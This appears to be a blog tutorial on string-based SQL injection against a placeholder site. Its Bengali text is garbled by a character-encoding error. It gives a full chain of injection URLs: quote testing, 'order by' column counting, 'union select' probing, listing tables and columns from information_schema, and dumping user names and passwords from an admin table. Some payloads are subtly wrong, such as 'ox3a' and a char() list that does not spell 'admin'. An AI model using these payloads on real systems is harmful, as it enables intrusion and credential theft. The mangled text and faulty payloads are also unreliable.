āϏāĻŦাāĻāĻে āϏ্āĻŦাāĻāϤāĻŽ āĻāĻŽাāϰ ⧍⧠āĻিāĻāĻোāϰিā§াāϞে
āĻāϤāĻŦাāϰেāϰ āĻিāĻāĻোāϰিā§াāϞে āĻāĻŽি āϞেāĻেāĻিāϞাāĻŽ basic union based SQL INJECTION āύিā§ে।
āĻāĻāĻেāϰ āĻিāĻāĻোāϰিā§াāϞে āĻāĻŽি āϞেāĻāĻŦো String Based SQL Injection āύিā§ে ।
SQL Injection āύিā§ে āϞেāĻা āĻāĻা āĻāĻŽাāϰ ⧍⧠āĻিāĻāĻোāϰিā§াāϞ ।
āĻāĻļা āĻāϰি āĻŽāύোāϝোāĻ āĻĻিā§ে āĻĒā§āĻŦেāύ।
āĻāϞুāύ āϤাāĻšāϞে āĻļুāϰু āĻāϰা āϝাāĻ
(āĻিāĻāĻোāϰিā§াāϞ āĻি āĻļুāϧুāĻŽাāϤ্āϰ āĻļিāĻ্āώāύীā§ āĻāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞিāĻিāϤ)
Union Based SQLi āĻি āϏেāĻা āĻŦোāĻাāϰ āĻāύ্āϝে āĻāĻŽাāϰ āĻāĻেāϰ āĻিāĻāĻোāϰিā§াāϞāĻি āĻĻেāĻāϤে āĻĒাāϰেāύঃ Web Site Hacking : Union Based Sql Injection
āϏāĻšāĻ āĻাāĻŦে āĻŦুāĻাāϤে āĻেāϞে String Based Sql Injection āĻšāϞো āϝāĻāύ āĻāĻāĻি āϏাāĻāĻ Sql Injection āĻুāϞāύāϰাāĻŦāϞ āĻšā§ ।
āĻিāύ্āϤু āϝāĻāύ āĻāĻ্āϝাāĻাāϰ Sql Injection āĻāĻŽাāύ্āĻĄ āĻāĻ্āϏিāĻিāĻāĻ āĻāϰে āϤāĻāύ āĻোāύো āϰেāϏাāϞ্āĻ āĻĻেāĻাā§ āύা।
(āĻāĻāĻা āĻļিāĻ্āώāύীā§ āĻŦিāώā§ঃ Sql Injection āĻāϰাāϰ āϏāĻŽā§ āĻ āύেāĻ āϏাāĻāĻে āĻĄাāĻা āĻā§েāĻŦ āĻĒেāĻāĻে āĻĻেāĻাā§ āύাāĻš।। āϏে āĻ্āώেāϤ্āϰে āĻĄাāĻা āĻĻেāĻাā§
āĻাāĻāĻেāϞ āĻŦাāϰে āĻŦ্āϰাāĻāĻাāϰেāϰ)
String Based SQL Injection āĻŦোāĻা āϝাā§ āĻ
āύেāĻ āϏāĻŽā§ āĻāϰāĻāĻŽ āĻāϰāϰ āĻĻেāĻে ।
āĻāĻ āϧāϰāύেāϰ āĻāϰāϰ।
"order by" doesn't work, example: order by 100--
āĻ
āύেāĻ āϏāĻŽā§ āύাāĻ āĻĨাāĻāϤে āĻĒাāϰে āϏে āĻ্āώেāϤ্āϰে āĻāĻĒāύি āĻĒ্āϰāĻĨāĻŽে
Basic SQL āĻ
āύুāϏāϰāύ āĻāϰে āϝāĻĻি āĻোāύো āϰেāϏাāϞ্āĻ āύা āĻĒাāύ āϤাāĻšāϞে āϏ্āĻ্āϰিং āĻŦেāĻāĻĄ SQL injection āĻ্āϰাāĻ āĻāϰে āĻĻেāĻāϤে āĻĒাāϰেāύ।
āĻāϏāϞে string based sqli āĻšāϞে āĻāĻĒāύি āĻāĻŽাāύ্āĻĄ āĻāĻ্āϏিāĻিāĻāĻ āĻāϰাāϰ āĻĒāϰāĻ āĻোāύো āϰেāϏাāϞ্āĻ āĻāϏāĻŦে āύা ।
āϏাāĻāĻāĻি āĻāĻেāϰ āĻŽāϤāύāĻ āύāϰāĻŽাāϞ āĻĻেāĻাāĻŦে।
Union Based āĻāϰ āϏাāĻĨে String Based āĻāϰ āĻŽāϧ্āϝে āϤেāĻŽāύ āĻোāύো āĻĒাāϰ্āĻĨāĻ্āϝ āύেāĻ।
āϤাāĻšāϞে āĻāϏুāύ āĻļুāϰু āĻāϰা āϝাāĻ।
āĻŽāύে āĻāϰুāύ āĻāϰāĻāĻŽ āĻāĻāĻি āϏাāĻāĻে āĻāĻŽāϰা SQLi āĻāϰāĻŦো।
http://site.com/index.php?id=10
āĻĒ্āϰāĻĨāĻŽেāĻ SQLi āĻুāϞāύাāϰāĻŦāϞ āύাāĻি āĻĻেāĻāĻŦো Url āĻāϰ āĻļেāώে ' āĻāĻ āĻিāĻš্āύ āĻি āĻĻিā§ে
http://site.com/index.php?id=10'
āĻāϰāϰ āĻĻেāĻāϤে āĻĒেāϞে āĻāĻŽাāĻĻেāϰ āĻাāĻ āĻšāĻŦে āϏাāĻāĻāĻিāϤে āĻā§āĻা āĻāϞাāĻŽ āĻāĻে āϏেāĻা āĻŦেāϰ āĻāϰা ।
āĻāĻāύ āĻāĻŽāϰা āĻĒ্āϰāĻĨāĻŽেāĻ Union Based āĻেāώ্āĻা āĻāϰে āĻĻেāĻāĻŦো ।
http://site.com/index.php?id=10 order by 10 (āĻোāύো āĻāϰāϰ āĻĻেāĻাāĻ্āĻে āύা āĻŦা āĻĄাāĻা āĻŽিāϏ āĻšāĻ্āĻে āύা)
order by āĻāϰ āĻĒāϰেāϰ āϏংāĻ্āϝা āĻি āĻŦাā§িā§ে āĻĻিā§ে āĻĻেāĻি
http://site.com/index.php?id=10 order by 1000 (āĻোāύো āĻāϰāϰ āĻĻেāĻাāĻ্āĻে āύা āĻŦা āĻĄাāĻা āĻŽিāϏ āĻšāĻ্āĻে āύা)
āϤাāĻšāϞে āĻāĻ āϏাāĻāĻāĻি āϤে āĻāĻŽāϰা String Based SQLi āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো।
āϝাāϰ āĻāύ্āϝে āĻāĻŽাāĻĻেāϰ id=value āĻāϰāĻĒāϰে āĻāĻāĻি ' (āϏ্āĻ্āϰিং) āϝুāĻ্āϤ āĻāϰāϤে āĻšāĻŦে āĻāĻŦং āĻāĻŽাāύ্āĻĄ āĻāϰ āĻļেāώে --+ (āĻŽাāĻāύাāϏ,āĻŽাāĻāύাāϏ,āĻĒ্āϞাāϏ) āĻāĻ āϏাāĻāύ
āĻুāϞো āϝুāĻ্āϤ āĻāϰāϤে āĻšāĻŦে।
āϤাāĻšāϞে āĻĻেāĻিঃ
http://site.com/index.php?id=10' order by 10--+ (āĻŽāύে āĻāϰুāύ āĻāϰāϰ āĻĻেāĻāϤে āĻĒেāϞাāĻŽ)
āĻāĻāύ āϝāĻĻি āĻāĻĒāύাāϰ āĻাāϰ্āĻেāĻ āϏাāĻāĻে ā§§ā§Ļ āĻি āĻāϞাāĻŽ āύা āĻĨাāĻে āϤাāĻšāϞে āĻāĻĒāύি āĻāϰāϰ āĻĻেāĻāϤে āĻĒাāĻŦেāύ āĻŦা āϏাāĻāĻāĻি āĻĨেāĻে āĻĄাāĻা āĻŽিāϏ āĻāϰāĻŦে।
(āĻŦিঃāĻĻ্āϰঃ āĻিāĻāĻোāϰিā§াāϞāĻি āĻļিāĻ্āώāύীā§ āĻāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞিāĻা āĻŦিāϧাā§ āĻāĻŽি āĻোāύো āϞাāĻāĻ āϏাāĻāĻ āύিā§ে āĻĻেāĻাāϞাāĻŽ āύা।)
- http://site.com/index.php?id=10' order by 9--+ (still Error)
- http://site.com/index.php?id=10' order by 8--+ (Error)
- http://site.com/index.php?id=10' order by 7--+ (Error)
- http://site.com/index.php?id=10' order by 6--+ (No Error)
āϤাāϰ āĻŽাāύে āĻšāϞো āϏাāĻāĻāĻি āϤে ā§Ŧ āĻি āĻāϞাāĻŽ ।
āĻāĻāύ āĻāĻŽāϰা āĻāĻ āĻā§āĻি āĻāϞাāĻŽ āĻĨেāĻে āĻোāύ āĻāϞাāĻŽ āĻি āĻুāϞāύাāϰাāĻŦāϞ āĻŦা āϏ্āĻ্āϰিং āĻāϞাāĻŽ āϏেāĻা āĻেāĻ āĻāϰāĻŦো āϝাāϰ āĻāύ্āϝে āĻāĻŽাāύ্āĻĄ āĻšāĻŦেঃ
- http://site.com/index.php?id=-10' union select 1,2,3,4,5,6--+
āĻāĻāύ āϏাāĻāĻেāϰ āĻĒেāĻāĻে āĻŦা āĻŦ্āϰাāĻāĻাāϰেāϰ āĻাāĻāĻেāϞ āĻŦাāϰে āĻুāϞāϰাāĻŦāϞ āĻāϞাāĻŽ/āĻāϞাāĻŽāĻিāϰ āύাāĻŽ্āĻŦাāϰ āĻĻেāĻাāĻŦে ।
(āĻুāϞāύাāϰāĻŦāϞ āĻāϞাāĻŽেāϰ āϏংāĻ্āϝা āĻ
āύেāĻ āϏāĻŽā§ ā§¨ āĻি āĻŦা āϤাāϰ āĻ
āϧিāĻ āĻšāϤে āĻĒাāϰে)
āĻāĻāύ āĻāĻŽāϰা āϝāĻĻি āĻুāϞāύাāϰāĻŦāϞ āĻāϞাāĻŽ āĻĒা⧠⧍ āύāĻŽ্āĻŦāϰ āĻāϞাāĻŽ।
āϤাāĻšāϞে āĻāĻŽāϰা āϏেāĻ āĻāϞাāĻŽেāϰ āĻাā§āĻাā§ SQLi āĻāĻŽাāύ্āĻĄ āĻĻিā§ে āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āĻĄাāĻা āϰিāĻĄ āĻāϰāϤে āĻĒাāϰāĻŦো।
#āĻĒ্āϰāĻĨāĻŽে āĻĻেāĻি āύিā§ āĻĄাāĻাāĻŦেāϏেāϰ Version āĻি āĻ Database Name āĻি āĻāĻŦং Database User āĻāϰ āύাāĻŽ ।
āϝাāϰ āĻāύ্āϝে āĻāĻŽāϰা āĻāĻŽাāύ্āĻĄ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো " group_concat(database()),concat(user(),ox3a,version "
āĻāĻĻাāĻšাāϰāύঃ
- http://site.com/index.php?id=-10' union select 1,group_concat(database()),concat(user(),ox3a,version ,3,4,5,6--+
(āĻāĻাāύে āϝেāĻšুāϤু āĻুāϞāύাāϰāĻŦāϞ āĻāϞাāĻŽ ⧍ āϤাāĻ āĻāĻŽāϰা ⧍ āύāĻŽ্āĻŦāϰ āĻāϰ āĻাā§āĻাā§ āĻāĻŽাāĻĻেāϰ āĻāĻŽাāύ্āĻĄ āϰাāύ āĻāϰাāĻŦো)
āĻāĻāύ āĻāĻŽāϰা
Version ,Database Name , Database User āĻāĻāĻুāϞা āĻĻেāĻāϤে āĻĒাāĻŦো ...
āĻāĻāύ āĻāĻŽāϰা āϝāĻĻি āĻĄাāĻাāĻŦেāĻেāϰ āĻেāĻŦāϞ āĻুāϞো āĻĻেāĻāϤে āĻাā§ āϤাāĻšāϞে āĻāĻŽাāύ্āĻĄ āĻšāĻŦে
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-
āĻāĻāύ āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏেāϰ āĻেāĻŦāϞ āĻুāϞোāϰ āύাāĻŽ āĻĻেāĻāϤে āĻĒাāĻŦো।
āĻāĻāύ āϝāĻĻি āĻāĻĒāύি āϝে āĻেāĻŦিāϞ āĻুāϞো āĻĒেāϞেāύ āϤাāϰ āĻŽāϧ্āϝে āĻāĻĒāύাāϰ āĻাāĻ্āĻিāϤ āĻĄাāĻা āϝে āĻেāĻŦিāϞে āĻāĻে āϏেāĻ āĻেāĻŦিāϞ āĻĨেāĻে āĻāϞাāĻŽ āĻŦেāϰ āĻāϰāϤে āĻাāύ।
āĻŽāύে āĻāϰেāύ āϝে āĻāĻĒāύি āĻĒেā§েāĻেāύ "admin" āύাāĻŽে āĻāĻ āĻেāĻŦিāϞ āĻি āĻāĻāύ āĻāĻĒāύি āϝāĻĻি "admin" āĻেāĻŦিāϞেāϰ āĻāϞাāĻŽ āĻুāϞো āĻĻেāĻāϤে āĻাāύ āϤাāϰ āĻāύ্āϝে āĻāĻŽাāύ্āĻĄ āĻšāĻŦে
āĻĒ্āϰāĻĨāĻŽে "admin" āĻেāĻŦিāϞ āύেāĻŽāĻিāĻে āĻšেāĻ্āϏে (hex) āĻāύāĻাāϰ্āĻ āĻāϰে āύিāϤে āĻšāĻŦে। āϝাāϰ āĻāύ্āϝে āĻŽোāĻিāϞা āĻŦ্āϰাāĻāĻাāϰে āĻš্āϝাāĻāĻŦাāϰ āύাāĻŽে āĻāĻāĻি āĻāĻĄāĻ
āύ āĻāĻে
āϏেāĻা āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāϤে āĻĒাāϰেāύ ।
"admin" āĻেāĻŦিāϞāĻে āĻšেāĻ্āϏে āϰুāĻĒাāύ্āϤāϰ āĻāϰাāϰ āĻĒāϰ āĻĒেāϞাāĻŽ 0x61646d696e
āĻāĻāύ āĻāĻŽাāύ্āĻĄāĻা āĻšāĻŦে।
āĻāĻĻাāĻšাāϰāĻŖঃ
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)--+-
āĻāĻāύ āĻāĻŽāϰা "admin" āĻেāĻŦিāϞেāϰ āĻāϞাāĻŽ āĻুāϞো āĻĻেāĻāϤে āĻĒাāĻŦো।
āĻŽāύে āĻāϰুāύ āĻāĻŽāϰা āĻĒেāϞাāĻŽঃ "id , user , password"
āĻāĻ āϤিāύāĻি āĻāϞাāĻŽ āĻĒেāϞাāĻŽ । āĻāĻāύ āĻāĻŽāϰা āϝāĻĻি āĻāĻ āϤিāύāĻি āĻāϞাāĻŽ āĻĨেāĻে āĻĄাāĻা āĻĄাāĻŽ্āĻĒ āĻāϰāϤে āĻাā§ āĻŦা āĻš্āϝাāĻ āĻāϰāϤে āĻাā§ ।
āϤাāĻšāϞে āĻāĻŽাāύ্āĻĄ āĻšāĻŦে ।
āĻāĻĻাāĻšাāϰāĻŖঃ
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(id,0x3e,user,0x3e,password),5,6 from admin--+-
āĻāĻ āĻāĻŽাāύ্āĻĄāĻি āĻāĻŽাāĻĻেāϰ admin āĻেāĻŦিāϞেāϰ id,user,password āĻāĻ āĻāϞাāĻŽ āĻুāϞোāϰ āĻĄাāĻা āĻĻেāĻাāĻŦে
āϧāύ্āϝāĻŦাāĻĻ āĻāώ্āĻ āĻāϰে āĻĒā§াāϰ āĻāύ্āϝে ।
āĻোāύো āĻ
āϏুāĻŦিāϧা āĻšāϞে āĻ
āĻĨāĻŦা āĻোāύো āĻাāϰāĻŖে āϝোāĻাāϝোāĻ āĻāϰāϤে āĻাā§āϞে āĻāĻŽাāϰ āĻĢেāĻāϏāĻŦুāĻ āĻāĻāĻĄিāϤে āϝোāĻাāϝোāĻ āĻāϰāϤে āĻĒাāϰেāύঃ
FACEBOOK ID
āϧāύ্āϝāĻŦাāĻĻ – āĻŽূāϞ āϞেāĻāĻে FACEBOOK ID
āĻĒোāϏ্āĻ āϏāĻŽ্āĻĒāϰ্āĻিāϤ āϏāĻŽāϏ্āϝাāϰ āĻāύ্āϝ āĻŽāύ্āϤāĻŦ্āϝ āĻĻিāύ।āĻĄাāĻāύāϞোāĻĄ āϞিāĻ্āĻ āĻ āϏāĻŽāϏ্āϝা āĻāύ্āϝ āĻāύāĻŦāĻ্āϏ āĻāϰুāύ Aimzworld007
ConversionConversion EmoticonEmoticon